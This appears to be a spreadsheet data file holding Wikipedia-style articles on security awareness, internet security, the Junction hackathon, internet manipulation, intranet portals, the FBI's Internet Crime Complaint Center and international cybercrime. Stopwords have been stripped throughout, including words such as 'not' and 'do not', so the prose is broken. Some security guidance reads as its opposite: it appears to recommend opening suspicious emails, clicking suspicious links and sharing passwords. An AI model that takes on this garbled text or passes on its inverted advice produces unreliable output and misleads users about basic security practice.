intellectual property (ip), sensitive information. security awareness guidelines include teaching related data classification, encryption, data anonymization, data masking data obfuscation. permissions access data, includes file sharing email attachments, additional safeguards could discussed. another data protection control could included backing data could restored original becomes unavailable. device management: involves knowing protect mobile devices computers. device management also concerned security related bring your device (byod). security awareness guidelines include encryption, protecting system password, pin, multi-factor authentication, forms credential. additional awareness tips include end-users downloading, installing, reviewing applications requested permissions unknown sources. according another awareness read reviews comments application installing additionally, public wifi another discussion point. device management also relates maintaining accurate inventory assets purchase disposition. this includes knowing wipe device media sanitization. incident response: incident observable event malicious intent. security awareness guidelines end-users include types events considered suspicious malicious, contacted incident occurs, actions taken event incident.internet things security: remotely controlled capable, resource constrained devices embedded sensor chips interact people objects collect data provide remote sources internet additional analysis effort personalize customize user's experience. these devices include limited smart speakers, wearable devices like smart watch, surveillance cameras, lights, door locks, thermostats, appliances cars. guidelines include maintaining asset inventory, patch control, changing default credentials.password management: password string secret characters used authenticate user's account. security awareness guidelines suggest presenting requirements creating strong password passphrase, frequently passwords changed, protect passwords. additionally, guidelines suggest need change default passwords share passwords others. additional protection options could include making end-users aware using multi-factor authentication, password managers, awareness various password-related threats like password cracking. patching: software system changes update, improve, resolve weaknesses usually released patch. security awareness guidelines include timely installation security patches well implementing vulnerability assessment vulnerability management. removable media: storage devices could added removed running computer, cds, dvds, removable cards, drives (including flash drives, thumb drives, external hard drives). security awareness guidelines include drive encryption following policy guidelines presented organizational level regarding personal removable media organizational systems.safe browsing: security awareness guidelines regarding securely navigating websites include looking padlock icon entering sensitive information like credentials, credit card information, personally identifiable information. another visual indicator "https" reflecting address. padlock "https" indicate entered information secure. lastly, guidance could shared privacy options browser incognito option limit information shared. another guideline consider using virtual private network (vpn).social engineering involves interacting humans hopes disclose sensitive information. security awareness guidelines include opening suspicious emails unrecognized senders, clicking suspicious links emails websites, opening attachments emails, disclosing information, responding suspicious emails contacts provided therein. also cybersecurity cybersecurity standards cybercrime countermeasure (computer) social engineering (security) threat (computer) malware references</t>
  </si>
  <si>
    <t>Internet security</t>
  </si>
  <si>
    <t>internet security branch computer security. encompasses internet, browser security, site security, network security applies applications operating systems whole. objective establish rules measures attacks internet. internet inherently insecure channel information exchange, high risk intrusion fraud, phishing, online viruses, trojans, ransomware worms. many methods used combat threats, including encryption ground-up engineering. threats malicious software malicious software comes many forms, viruses, trojan horses, spyware, worms. malware, portmanteau malicious software, software used disrupt computer operation, gather sensitive information, gain access private computer systems. malware defined malicious intent, acting requirements computer user, include software unintentionally causes harm deficiency. term badware applies malware unintentionally harmful software. botnet network computers taken robot performs large-scale malicious acts creator. computer viruses programs replicate structures effects infecting files structures computer. typical purpose virus take computer steal data. computer worms programs replicate throughout computer network. ransomware type malware restricts access computer system infects, demands ransom order restriction removed. scareware program usually limited benefit, containing malicious payloads, sold unethical marketing practices. selling approach uses social engineering cause shock, anxiety, perception threat, generally directed unsuspecting user. spyware refers programs surreptitiously monitor activity computer system report information others without user's consent. particular kind spyware logging malware. often referred keylogging keyboard capturing, action recording (logging) keys struck keyboard. trojan horse, commonly known trojan, general term malware pretends harmless, user convinced download onto computer. denial-of-service attacks denial-of-service attack (dos) distributed denial-of-service attack (ddos) attempt make computer resource unavailable intended users. works making many service requests system overwhelmed becomes unable process them. target cloud computing systems. according business participants international security survey, respondents experienced attack 2007 another 16.8% 2010. attacks often bots botnet) carry attack. phishing phishing targets online users attempt extract sensitive information passwords financial information. phishing occurs attacker pretends trustworthy entity, either email page. victims directed pages appear legitimate, instead route information attackers. tactics email spoofing attempt make emails appear legitimate senders, long complex urls hide actual website. insurance group claimed phishing accounted worldwide losses $10.8 billion 2016. middle man-in-the-middle (mitm) attack type cyber attack. cybercriminals intercept data sent people steal, eavesdrop modify data certain malicious purposes, extorting money identity theft. public wifi often insecure monitoring intercepting traffic unknown. application vulnerabilities applications used access internet resources contain security vulnerabilities memory safety bugs flawed authentication checks. such bugs give network attackers full control computer.a widespread web-browser application vulnerability cross-origin resource sharing (cors) vulnerability maximum security privacy, make sure adopt adequate countermeasures (such patches provided webkit-based browsers). countermeasures network layer security tcp/ip protocols secured cryptographic methods security protocols. these protocols include secure sockets layer (ssl), succeeded transport layer security (tls) traffic, pretty good privacy (pgp) email, ipsec network layer security. internet protocol security (ipsec) ipsec designed protect tcp/ip communication secure manner. security extensions developed internet engineering task force (ietf). provides security authentication layer transforming data using encryption. main types transformation form basis ipsec: authentication header (ah) esp. they provide data integrity, data origin authentication, anti-replay services. these protocols used alone combination. basic components include: security protocols security association policy management traffic processing manual automatic management internet exchange (ike) algorithms authentication encryptionthe algorithm allows sets work independently without affecting parts implementation. ipsec implementation operated host security gateway environment giving protection traffic. threat modeling threat modeling tools helps proactively analyze cyber security posture system system systems prevent security threats. multi-factor authentication multi-factor authentication (mfa) access control method user granted access successfully presenting separate pieces evidence authentication mechanism following categories: knowledge (something know), possession (something have), inherence (something are). internet resources, websites email, secured using technique. security token some online sites offer customers ability six-digit code randomly changes every 30–60 seconds physical security token. token built-in computations manipulates numbers based current time. this means every thirty seconds certain array numbers validate access. website made aware device's serial number knows computation correct time verify number. after 30–60 seconds device presents random six-digit number website. electronic mail security background email messages composed, delivered, stored multiple step process, starts message's composition. when message sent, transformed standard format according 2822. using network connection, mail client sends sender's identity, recipient list message content server. once server receives information, forwards message recipients. pretty good privacy (pgp) pretty good privacy provides confidentiality encrypting messages transmitted data files stored using encryption algorithm triple cast-128. email messages protected using cryptography various ways, following: digitally signing message ensure integrity confirm sender's identity. encrypting message body email message ensure confidentiality. encrypting communications mail servers protect confidentiality message body message header.the first methods, message signing message body encryption, often used together; however, encrypting transmissions mail servers typically used organizations want protect emails regularly sent them. example, organizations could establish virtual private network (vpn) encrypt communications mail servers. unlike methods encrypt message body, encrypt communication connection, including email header information senders, recipients, subjects. however, provide message signing mechanism, provide protection email messages along entire route sender recipient. message authentication code message authentication code (mac) cryptography method uses secret digitally sign message. this method outputs value decrypted receiver, using secret used sender. message authentication code protects message's data integrity well authenticity. firewalls computer firewall controls access single computer. network firewall controls access entire network. firewall security device computer hardware software filters traffic blocks outsiders. generally consists gateways filters. firewalls also screen network traffic block traffic deemed unauthorized. security firewalls restrict incoming outgoing network packets. only authorized traffic allowed pass firewalls create checkpoints networks computers. firewalls block traffic based source port number. they also serve platform ipsec. using tunnel mode, firewalls implement vpns. firewalls also limit network exposure hiding internal network public internet. types firewall packet filter packet filter processes network traffic packet-by-packet basis. main filter traffic remote host, router needed connect internal network internet. router known screening router, screens packets leaving entering network. stateful packet inspection stateful firewall circuit-level gateway proxy server operates network level open systems interconnect (osi) model statically defines traffic allowed. circuit proxies forward network packets (formatted data) containing given port number, port permitted algorithm. main advantage proxy server ability provide network address translation (nat), hide user's address internet, effectively protecting internal information outside. application-level gateway application-level firewall third generation firewall proxy server operates model, suite application level. network packet forwarded connection established using known protocol. application-level gateways notable analyzing entire messages rather individual packets. browser choice browser market share predicts share hacker attacks. example, internet explorer used lead market, heavily attacked. protections antivirus antivirus software protect programmable device detecting eliminating malware. variety techniques used, signature-based, heuristics, rootkit, real-time. password managers password manager software application creates, stores provides passwords applications. password managers encrypt passwords. user needs remember single master password access store. security suites security suites first offered sale 2003 (mcafee) contain firewalls, anti-virus, anti-spyware components. they also offer theft protection, portable storage device safety check, private internet browsing, cloud anti-spam, file shredder make security-related decisions (answering popup windows) several free charge. history national association mutual savings banks (namsb) conference january 1976, atalla corporation (founded mohamed atalla) bunker ramo corporation (founded george bunker simon ramo) introduced earliest products designed dealing online security. atalla later added identikey hardware security module, andj supported processing online transactions network security. designed process bank transactions online, identikey system extended shared-facility operations. compatible various switching networks, capable resetting electronically 64,000 irreversible nonlinear algorithms directed card data information. 1979, atalla introduced first network security processor (nsp). also references external links national institute standards technology (nist.gov) information technology portal links computer- cyber security national institute standards technology (nist.gov) -computer security resource center -guidelines electronic mail security, version pwdhash stanford university firefox browser extensions transparently convert user's password domain-specific password. cybertelecom.org security surveying federal internet security work reports.com- broadband reports, faqs forums internet security, 1999</t>
  </si>
  <si>
    <t>Junction (hackathon)</t>
  </si>
  <si>
    <t>junction hackathon organizer headquarters espoo, finland. started 2015, junction grew largest organizers europe. 2018 expanded globally junction event tsinghua university china cooperation chinese south korean universities bringing high performing students attend event helsinki.during years junction introduced various formats events public, biggest yearly junction hackathon. this event brings together developers, designers, entrepreneurs around world helps build solutions real world challenges local multinational companies. history junction 2015 junction first launched 2015. event held november 6-8th kattilahalli, helsinki gathered participants resulted different projects. notable partners included uber, finnair, supercell, reaktor, others.the winner junction 2015 slush smackdown, supercell unlimited track. team created game players program boxer competes players' codes real-time. also whole slush hacks -hackathon competition main prize, worth eur. junction 2016 junction 2016 held november 25–27 wanha satama, katajanokka, helsinki, finland. about 1300 participants nationalities attended hackathon. partners included supercell, zalando, european space agency, general electric, sitra, tieto, others.the teams hours develop ideas afterwards demo attendants judges. main prize winning idea 2016 event eur, many companies offered bounties solving challenges specific using pre-specified technology. teams provided number different api's emerging technologies develop concepts including oculus rifts, vives, apple watches, 3d-printers, microsoft hololens, estimote beacons among others. winner team suju.online, created tool event organizers public transportation decision makers allows design dynamic routing self-driving bus. team originated local aalto university hack part future mobility track. junction 2017 junction 2017 held november 24–26 dipoli, main building otaniemi campus aalto university. about 1500 participants nationalities attended hackathon. partners included spotify, daimler, smartly.io, european space agency, microsoft others.as always, teams hours work projects, event ending sunday demo expo. this year, winner main prize appointed using judging process. open source technology called gavel used first determine finalists track. then, panel expert judges inspected finalist delicate detail, even going project's code repositories. main prize team glados. team created signvision, tool maintenance personnel traffic signs need repaired. hack part data track. junction 2018 junction 2018 held november 23–25 dipoli, espoo, finland. about 1300 participants world attended hackathon. partners included facebook, daimler, supercell, mckinsey, epic games, vkontakte, ericsson others.the teams hours work projects, event ending sunday demo expo. 2018, reviewing process main-prize winner improved make transparent participants. instead multi-level process unclear participants, junction 2018 used peer reviewing system, participants chose main winner.the winner project oneiro, created previous winning team glados. oneiro application lets electric vehicle owners rent chargers others need. junction 2019 junction 2019 held november 15–17 väre building, aalto university school arts, design architecture aalto university school business located. about 1500 participants world attended event. partners included cgi, ericsson, rovio, microsoft, valmet, sitra, business finland many more. junction 2020 connected junction 2020 connected held november 6–8. covid-19 pandemic opened doors hybrid event, gathering people world simultaneously hack physical locations online. partners included genelec, hkscan, paulig, supercell, aito brella.the winner project saavi healthy finance. team presented mobile solution banks helps customers understand level financial health analyzing spendings subscriptions help machine learning entertaining experience interaction personal finance junction 2021 junction 2021 held november 19–21. hackathon organized hybrid form, participants could attend live hubs scattered around world join challenge online gather. partners included huawei, kone, cgi, miro, oras others. main prize team nice-ify. team created replaces hateful language nice-ified alternative live voice-chat environments. junction main prize winners other events concepts tech tech non-profit tech meetup organized monthly helsinki, finland. meetups consist keynote speeches, demos, research showcases discussions, focusing current tech topic. past speakers included risto siilasmaa (chairman, nokia f-secure), ilkka paananen (founder ceo, supercell), lidia perovskaya (project manager, vkontakte), kimmo kanto (head space, business finland), anne oikarinen (senior security consultant, nixu) many more. junctionx junctionx global hackathon program launched 2018 local teams across world organize hackathon event home city. junctionx organized various cities around world including tokyo (japan), hanoi (vietnam), budapest (hungary), seoul (south korea), thuwal (saudi arabia) many more. 2020 junctionx expand exeter (united kingdom), algiers (algeria) barcelona (spain). other events tech race tech race series smaller hackathons cities across finland europe compete other. terminal terminal official pre-event junction. during terminal participants take part different activities helsinki area attend events hosted partner companies. stupid hack smaller hackathon event instead solving companies' real challenges participants compete comes stupidest idea execution. organization junction volunteer-based, non-profit organization composed mainly students different finnish universities. owned non-profit foundation startup säätiö, gathers funding partnership contracts partner companies. other notable hackathon events hackmit hacks mhacks references</t>
  </si>
  <si>
    <t>Internet manipulation</t>
  </si>
  <si>
    <t>internet manipulation refers co-optation digital technology, social media algorithms automated scripts, commercial, social political purposes. such tactics employed explicit intent manipulate public opinion, polarise citizens, silence political dissidents, harm corporate political adversaries, improve personal brand reputation. hackers, hired professionals private citizens reported engage internet manipulation using software typically internet bots social bots, votebots clickbots.cognitive hacking refers cyberattack aims change users' perceptions corresponding behaviors.internet manipulation sometimes also used describe selective internet censorship violations neutrality. issues behavior manipulation: fake news, disinformation, secretly affect behavior. this different issue affecting cognitive beliefs, operate outside awareness, making harder detect. high-arousal emotion virality: found content evokes high-arousal emotions (e.g. awe, anger, anxiety hidden sexual meaning) viral content holds many elements: surprising, interesting, useful taken consideration. simplicity complexity: providing perpetuating simple explanations complex circumstances used online manipulation. often easier believe, come advance adequate investigations higher virality complex, nuanced explanations information. (see also: low-information rationality) peer-influence: prior collective ratings content influences ones perception 2015 shown perceived beauty piece artwork online context varies external influence confederate ratings manipulated opinion credibility participants experiment asked evaluate piece artwork. furthermore, reddit, found content initially gets down- upvotes often continues going negative, vice versa. this referred "bandwagon/snowball voting" reddit users administrators. filter bubbles: echo chambers filter bubbles might created website administrators moderators locking people altering viewpoints establishing certain rules typical member viewpoints online sub/communities internet "tribes" confirmation bias manipulated prevalence: fake news need read effect quantity emotional effect headlines sound bites alone. specific points, views, issues people's apparent prevalence amplified, stimulated simulated. (see also: mere-exposure effect) information timeliness uncorrectability: clarifications, conspiracy busting fake news exposure often come late damage already done and/or reach bulk audience associated misinformation psychological targeting: social media activities data used analyze personality people predict behaviour preferences. michal kosinski developed procedure. such used media information tailored person's psyche e.g. facebook. according reports played integral part donald trump's win. (see also: targeted advertising, personalized marketing) algorithms, echo chambers polarization overabundance online content, social networking platforms search engines leveraged algorithms tailor personalize users' feeds based individual preferences. however, algorithms also restrict exposure different viewpoints content. this commonly referred "echo-chambers" "filter-bubbles".with help algorithms, filter bubbles influence users' choices perception reality giving impression particular point view representation widely shared. following 2016 referendum membership european union united kingdom united states presidential elections, gained attention many individuals confessed surprise results seemed distant expectations. range pluralism influenced personalized individualization services diminishes choice. five manipulative verbal influences found media texts. there self-expression, semantic speech strategies, persuasive strategies, swipe films information manipulation. vocabulary toolkit speech manipulation includes euphemism, mood vocabulary, situational adjectives, slogans, verbal metaphors, etc.research echo chambers flaxman, goel, rao, pariser, grömping suggest social media search engines tends increase ideological distance among individuals. comparisons online off-line segregation indicated segregation tends higher face-to-face interactions neighbors, co-workers, family members, reviews existing research indicated available empirical evidence support pessimistic views polarization. study conducted bakshy, messing, adamic facebook university michigan, example, suggested individuals’ choices drive algorithmic filtering, limiting exposure range content. while algorithms causing polarization, could amplify representing significant component information landscape. research intelligence military agencies joint threat research intelligence group unit government communications headquarters (gchq), british intelligence agency revealed part global surveillance disclosures documents leaked former national security agency contractor edward snowden mission scope includes using "dirty tricks" "destroy, deny, degrade [and] disrupt" enemies. core-tactics include injecting false material onto internet order destroy reputation targets manipulating online discourse activism methods posting material internet falsely attributing someone else, pretending victim target individual whose reputation intended destroyed posting "negative information" various forums used.known "effects" operations, work jtrig become "major part" gchq's operations 2010. unit's online propaganda efforts (named "online covert action") utilize "mass messaging" "pushing [of] stories" medium twitter, flickr, facebook youtube. online "false flag" operations also used jtrig targets. jtrig also changed photographs social media sites, well emailing texting colleagues neighbours "unsavory information" targeted individual. june 2015, files published glenn greenwald revealed details jtrig's work covertly manipulating online communities. disclosures also revealed technique "credential harvesting", journalists could used disseminate information identify non-british journalists who, manipulated, could give information intended target secret campaign, perhaps providing access interview. unknown whether journalists would aware manipulated.furthermore, russia frequently accused financing "trolls" post pro-russian opinions across internet. internet research agency become known employing hundreds russians post propaganda online fake identities order create illusion massive support. 2016 russia accused sophisticated propaganda campaigns spread fake news goal punishing democrat hillary clinton helping republican donald trump 2016 presidential election well undermining faith american democracy.in 2017 report facebook publicly stated site exploited governments manipulation public opinion countries including presidential elections france. identified three main components involved information operations campaign: targeted data collection, content creation false amplification includes stealing exposing information that's public; spreading stories, false real, third parties fake accounts; fake accounts coordinated manipulate political discussion, amplifying voices repressing others. politics 2016 andrés sepúlveda disclosed manipulated public opinion elections latin america. according budget $600,000 team hackers stole campaign strategies, manipulated social media create false waves enthusiasm derision, installed spyware opposition offices help enrique peña nieto, right-of-center candidate, election.in india's 2014 elections, bharatiya janata party (bjp) congress party accused hiring "political trolls" talk favourably blogs social media.the chinese government also believed so-called "50-cent army" reference much said paid) "internet water army" reinforce favourable opinion towards chinese communist party (ccp) well suppress dissent.in december 2014 ukrainian information ministry launched counter russian propaganda first tasks creation social media accounts (also known i-army) amassing friends posing residents eastern ukraine.twitter suspended number accounts appeared spreading pro-saudi arabian tweets disappearance saudi dissident journalist jamal khashoggi. business marketing trolling applications april 2009, internet trolls 4chan voted christopher poole, founder site, world's influential person 2008 16,794,368 votes open internet poll conducted time magazine. results questioned even poll completed, automated voting programs manual ballot stuffing used influence vote. 4chan's interference vote seemed increasingly likely, found reading first letter first candidates poll spelled phrase containing 4chan memes: "marblecake. also, game".jokesters politically oriented hacktivists share sophisticated knowledge manipulate social media. countermeasures wired noted nation-state rules compulsory registration threats punishment adequate measures combat problem online bots.to guard issue prior ratings influencing perception several websites reddit taken steps hiding vote-count specified time.some potential measures discussion flagging posts likely satire false. instance december 2016 facebook announced disputed articles marked help users outside fact checkers. company seeks ways identify 'information operations' fake accounts suspended 30,000 accounts presidential election france strike information operations.inventor world wide berners-lee considers putting companies charge deciding true risky proposition states openness make truthful. example points wikipedia which, perfect, allows anyone edit success technology also governance site. namely, army countless volunteers ways determining true.furthermore, various kinds software used combat problem fake checking software voluntary browser extensions store every website reads browsing history deliver fake revelations read fake story kind consensus found falsehood story.furthermore, daniel suarez asks society value critical analytic thinking suggests education reforms introduction 'formal logic' discipline schools training media literacy objective evaluation. government responses according study oxford internet institute, least countries around globe proposed implemented regulations specifically designed tackle different aspects influence campaigns, including fake news, social media abuse, election interference. germany germany, period preceding elections september 2017, major political parties save publicly announced would social bots campaigns. additionally, committed strongly condemning usage online bots. moves towards regulation social media made: three german states hessen, bavaria, saxony-anhalt proposed early 2017 would mean social media users could face prosecution violate terms conditions platform. example, pseudonym facebook, creation fake account, would punishable year's imprisonment. italy early 2018, italian communications agency agcom published guidelines website, targeting elections march year. main topics are: political subjects’s equal treatment political propaganda’s transparency contents illicit activities whose dissemination forbidden (i.e. polls) social media accounts public administrations political propaganda forbidden election before recommendations stronger fact-checking services france november 2018, manipulation information passed france. stipulates campaign periods: digital platforms must disclose amount paid names authors. past certain traffic threshold, platforms required representative present france, must publish algorithms used. interim judge pass legal injunction halt spread fake news swiftly. 'fake news' must satisfy following: (a)it must manifest; must disseminated massive scale; lead disturbance peace compromise outcome election. malaysia april 2018, malaysian parliament passed anti-fake news act. defined fake news 'news, information, data reports wholly partly false.' this applied citizens working digital publication, imprisonment years possible. however, repealed heavy criticism august 2018. kenya 2018, president uhuru kenyatta signed computer cybercrimes bill, criminalised cybercrimes including cyberbullying cyberespionage. person “intentionally publishes false, misleading fictitious data misinforms intent data shall considered acted upon authentic,” subject fines years imprisonment. research german chancellor angela merkel issued bundestag deal possibilities political manipulation social bots fake news. also sources this article incorporates text free content work. licensed license statement/permission. text taken world trends freedom expression media development global report 2017/2018, 202, university oxford, unesco. learn open license text wikipedia articles, please how-to page. information reusing text wikipedia, please terms use. references external links technology changing think, daniel suarez talk youtube "bots" control your life, daniel suarez talk youtube "the power manipulation". deutsche welle. october 2016. wp:promo make putin pout creepy face-tracking tech, facial expression manipulation</t>
  </si>
  <si>
    <t>Intranet portal</t>
  </si>
  <si>
    <t>intranet portal gateway unifies access enterprise information applications intranet. tool helps company manage data, applications, information easily personalized views. some portal solutions able integrate legacy applications, objects portals, handle thousands user requests. corporate enterprise environment, also known enterprise portal. background intranet internet share many elements technologies, fundamentally differ missions. unlike internet, intranet operates within private network necessarily connected web. connectivity transpires within process called address mapping. here, intranet addresses converted internet addresses provide required transparency vice versa.through intranet portal, private network able impose local rules behavior installation maintenance mechanism firewall intranet portal solutions. internet browsers cannot connect server behind must contact gateway machine abide restrictions mandated gateway. only users within organization access network. users also access internet abiding local rules. scope network allows intranet portal perform faster higher throughput internet. history corporate intranets began gaining popularity 1990s. intranets quickly grew complex, concept intranet portal born. today, intranet portals provide value-added capabilities managing workflows, increasing collaboration work groups, allowing content creators self publish information. typical example platform used build host intranet microsoft sharepoint, used organizations. sharepoint provides features necessary collaboration, integration, customization. main features integration ability integrate current tools possibility adding tools. outlook calendar email integrated intranet. security enable user- group-based security secure documents sites throughout intranet portal. customization software flexible allow organization. parts used create custom modules make interaction site easier. ability users customize tools resources often. collaboration people able collaborate work other. example would multiple people working document. communication channels allows corporations promote corporate culture present information interactive before. automation things like workflows templates automate specific document creation. alerts created help learn changes additions intranet. applications links applications associates perform duties. user friendly application must easy understand wide range technical abilities. remote access ability users access content away office. document repository ability store retrieve document information maintaining regular backups prevent data loss. blog used method provide timely information employees, customers, business partners. people search search enterprise wide employee information contact information, specialty areas, group membership, personal interest, etc. enterprise search search enterprise content using enterprise search targeted content business portal administrators target content business group area, e.g., marketing, legal, corporate executives, etc. advantages intranet portal helps employees make better informed decisions, result increased knowledge. also helps reduce costs, saves time, increases collaboration, increases productivity effectiveness. intranet portal help employees find information easily perform jobs better, though portal designs optimal out-of-the-box. fact, especially smaller companies, designers realize features found off-the-shelf portal software simpler (do-it-yourself) means. most intranets become completely unwieldy present highly fragmented confusing user experience, consistency little navigational support. portals correct problem presenting single gateway corporate information services. benefit creating consistent look feel users need less time learn environment. they also easily recognize portal go—no small feat navigating large information space. integrating services presenting personalized snippets initial screen, intranet portals also reduce need users browse wide obtain needed information, thus making easier perform jobs.intranet portal web-based tool allows users create customized site dynamically pulls internet activities desired content single page. providing contextual framework information, portals bring (science technology) organizational "knowledge" desktop. disadvantages intranet portals large business cost. maintenance management time consuming expensive. cost keep portal running cost system goes offline. most intranets established organization's resources place offline force operations hold. security issues become ongoing problem. unauthorized access concern result users gaining access sensitive information. denial access cause issues users needing access work. having everything place good organized. information overload make finding information difficult lowering productivity. activities tools resources area employees link download necessary applications perform work functions. information also provided find internal external resources. associate services business operations give users access important business policies manuals. company calendar give user access important company event dates times. access point employees location employees default main company webpage obtain information regarding company. wiki used business environment knowledge management workflow management establish work flows common business tasks submitting expense reports, submitting corporate paperwork document approval processes. bulletin board manage corporate announcements. task management create update shared task lists throughout corporation. notable software tools also enterprise portal intranet portal references external links agilityportal, simple intranet software must great employee experience. secured inside/outside portal: oracle white paper nielsen norman group report: usability intranet portals shivakumar, shailesh kumar (2015). complete guide portals user experience platforms (1st ed.). chapman hall/crc. isbn 978-1498725491. mythdhr portal jtime portal dgme portal</t>
  </si>
  <si>
    <t>Internet Crime Complaint Center</t>
  </si>
  <si>
    <t>internet crime complaint center (ic3) division federal bureau investigation (fbi) concerning suspected internet-facilitated criminal activity. gives victims convenient easy-to-use reporting mechanism alerts authorities suspected criminal civil violations internet. develops leads notifies enforcement agencies federal, state, local international level. information sent analyzed disseminated investigative intelligence purposes enforcement public awareness. history founded 2000 internet fraud complaint center (ifcc), primarily focusing online fraud, intellectual property rights matters, computer intrusions, economic espionage, online extortion, international money laundering, identity theft, internet-facilitated crimes. with realization crimes facilitated online chance overlap crimes, crimes committed facilitated online fraud, ifcc renamed internet crime complaint center october 2003 better reflect broad character matters, minimize need distinguish online fraud potentially overlapping cyber crimes. also list convicted computer criminals references external links official website 2012 press releases internet crime complaint center (ic3) intelligence note prepared internet crime complaint center (ic3), january 2012 internet crime initiative combines resources, expertise fbi, september 2013 2016 annual report</t>
  </si>
  <si>
    <t>International cybercrime</t>
  </si>
  <si>
    <t>there commonly agreed single definition “cybercrime”. refers illegal internet-mediated activities often take place global electronic networks. cybercrime "international" "transnational" cyber-borders countries'. international cybercrimes often challenge effectiveness domestic international law, enforcement. because existing laws many countries tailored deal cybercrime, criminals increasingly conduct crimes internet order take advantages less severe punishments difficulties traced. matter, developing developed countries, governments industries gradually realized colossal threats cybercrime economic political security public interests. however, complexity types forms cybercrime increases difficulty fight back. sense, fighting cybercrime calls international cooperation. various organizations governments already made joint efforts establishing global standards legislation enforcement regional international scale. china–united states cooperation striking progress recently, source countries cybercrime. information communication technology (ict) plays important role helping ensure interoperability security based global standards. general countermeasures adopted cracking cybercrime, legal measures perfecting legislation technical measures tracking crimes network, internet content control, using public private proxy computer forensics, encryption plausible deniability, etc. heterogeneity enforcement technical countermeasures different countries, article mainly focus legislative regulatory initiatives international cooperation. typology terms cybercrime, often associate various forms internet attacks, hacking, trojans, malware (keyloggers), botnet, denial-of-service (dos), spoofing, phishing, vishing. though cybercrime encompasses broad range illegal activities, generally divided five categories: intrusive offenses illegal access: “hacking” major forms offenses refers unlawful access computer system. data espionage: offenders intercept communications users (such e-mails) targeting communication infrastructure fixed lines wireless, internet service (e.g., e-mail servers, chat voip communications). data interference: offenders violate integrity data interfere deleting, suppressing, altering data restricting access them. content-related offenses pornographic material (child-pornography): sexually related content among first content commercially distributed internet. racism, hate speech, glorification violence: radical groups mass communication systems internet spread propaganda. religious offenses: growing number websites present material countries covered provisions related religious offenses, e.g., anti-religious written statements. spam: offenders send bulk mails unidentified source mail server often contains useless advertisements pictures. copyright trademark-related offenses common copyright offenses: cyber copyright infringement software, music films. trademark violations: well-known aspect global trade. serious offenses include phishing domain name-related offenses, cybersquatting. computer-related offenses fraud: online auction fraud, advance fraud, credit card fraud, internet banking forgery: manipulation digital documents. identity theft: refers stealing private information including social security numbers (ssn), passport numbers, date birth, addresses, phone numbers, passwords non-financial financial accounts. combination offenses cyberterrorism: main purposes propaganda, information gathering, preparation real-world attacks, publication training material, communication, terrorist financing attacks critical infrastructure. cyberwarfare: describes icts conducting warfare using internet. cyberlaundering: conducting crime virtual currencies, online casinos etc. threats similar conventional crime, economic benefits, power, revenge, adventure, ideology lust core driving forces cybercrime. major threats caused motivations categorized following: economic security, reputation social trust severely challenged cyber fraud, counterfeiting, impersonation concealment identity, extortion, electronic money laundering, copyright infringement evasion. public interest national security threatened dissemination offensive material —e.g., pornographic, defamatory inflammatory/intrusive communication— cyber stalking/harassment, child pornography paedophilia, electronic vandalism/terrorism. privacy, domestic even diplomatic information security harmed unauthorized access misuse ict, denial services, illegal interception communication.domestic, well international security threatened cybercrime transnational characteristic. single country really handle issue own. imperative collaborate defend cybercrime global scale. international trends criminals aware potentially large economic gains achieved cybercrime, tend switch simple adventure vandalism targeted attacks, especially platforms valuable information highly concentrates, computer, mobile devices cloud. there several emerging international trends cybercrime. platform switch: cybercrime switching battle ground windows-system platforms, including mobile phones, tablet computers, voip. because significant threshold vulnerabilities reached. vendors building better security products providing faster updates, patches user alert potential flaws. besides, global mobile devices’ penetration—from smart phones tablet pcs—accessing internet 2013 surpass billion, creating opportunities cybercrime. massively successful banking trojan, zeus already adapted mobile platform. smishing, phishing, another method cyber criminals using exploit mobile devices, users download falling prey social engineering ploy, designed defeat sms-based two-factor authentication banks confirm online funds transfers customers. voip systems used support vishing (telephone-based phishing) schemes, growing popularity. social engineering scams: refers non-technical kind intrusion, form e-mails social networking chats, relies heavily human interaction often involves fooling potential victims downloading malware leaking personal data. social engineering nevertheless highly effective attacking well-protected computer systems exploitation trust. social networking becomes increasingly important tool cyber criminals recruit money mules assist money laundering operations around globe. spammers spoofing social networking messages persuade targets click links emails taking advantage users’ trust social networking connections attract victims. highly targeted: newest twist "hypertargeting" malware meant disrupt industrial systems stuxnet network worm, exploits zero-day vulnerabilities microsoft. first known copy worm discovered plant germany. subsequent variant widespread global outbreak. dissemination malware: malware generally takes form virus, worm, trojan horse, spyware. 2009, majority malware connects host sites registered u.s.a. (51.4%), china second (17.2%), spain third (15.7%). primary means malware dissemination email. truly international scope. intellectual property theft theft): estimated software, dvds, sold countries counterfeit, total global trade counterfeit goods $600 billion year. alone, theft costs businesses estimated $250 billion annually, 750,000 jobs. international legislative responses cooperation international responses group eight (g8) made heads eight industrialized countries: u.s., united kingdom, russia, france, italy, japan, germany, canada. 1997, released ministers' communiqué includes action plan principles combat cybercrime protect data systems unauthorized impairment. also mandates enforcement personnel must trained equipped address cybercrime, designates member countries point contact hours day/7 days week basis.united nations 1990 general assembly adopted resolution dealing computer crime legislation. 2000 adopted resolution combating criminal misuse information technology. 2002 adopted second resolution criminal misuse information technology.itu international telecommunication union (itu), specialized agency within united nations, plays leading role standardization development telecommunications cybersecurity issues. lead agency world summit information society (wsis). 2003, geneva declaration principles geneva plan action released, highlights importance measures fight cybercrime. 2005, tunis commitment tunis agenda adopted information society. council europe council europe international organisation focusing development human rights democracy european member states. 2001, convention cybercrime, first international convention aimed internet criminal behaviors, co-drafted council europe addition usa, canada, japan signed member states. countries ratified later. aims providing basis effective legal framework fighting cybercrime, harmonization cybercriminal offenses qualification, provision laws empowering enforcement enabling international cooperation. regional responses apec asia-pacific economic cooperation (apec) international forum seeks promote promoting open trade practical economic cooperation asia-pacific region. 2002, apec issued cybersecurity strategy included shanghai declaration. strategy outlined areas co-operation among member economies including legal developments, information sharing co-operation, security technical guidelines, public awareness, training education. oecd organisation economic co-operation development (oecd) international economic organisation countries founded 1961 stimulate economic progress world trade. 1990, information, computer communications policy (iccp) committee created expert group develop guidelines information security drafted 1992 adopted oecd council. 2002, oecd announced completion "guidelines security information systems networks: towards culture security". european union 2001, european commission published communication titled "creating safer information society improving security information infrastructures combating computer-related crime". 2002, presented proposal “framework decision attacks information systems”. framework decision takes note convention cybercrime, concentrates harmonisation substantive criminal provisions designed protect infrastructure elements. commonwealth 2002, commonwealth nations presented model cybercrime provides legal framework harmonise legislation within commonwealth enable international cooperation. model intentionally drafted accordance convention cybercrime.ecowas economic community west african states (ecowas) regional group west african countries founded 1975 fifteen member states. 2009, ecowas adopted directive fighting cybercrime ecowas provides legal framework member states, includes substantive criminal well procedural law.gcc 2007, arab league gulf cooperation council (gcc) recommended conference seeking joint approach takes consideration international standards. voluntary industry response during past years, public-private partnerships emerged promising approach tackling cybersecurity issues around globe. executive 